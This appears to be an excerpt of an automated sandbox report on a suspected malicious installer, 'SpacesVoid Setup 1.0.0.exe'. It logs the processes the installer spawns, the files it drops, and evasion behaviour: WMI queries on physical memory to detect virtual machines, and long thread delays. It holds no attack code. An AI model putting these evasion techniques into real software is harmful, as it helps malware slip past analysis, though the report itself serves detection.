Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2405
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3633

Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\StdUtils.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\SpiderBanner.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\nsExec.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.node	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SpacesVoid Setup 1.0.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz664C.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
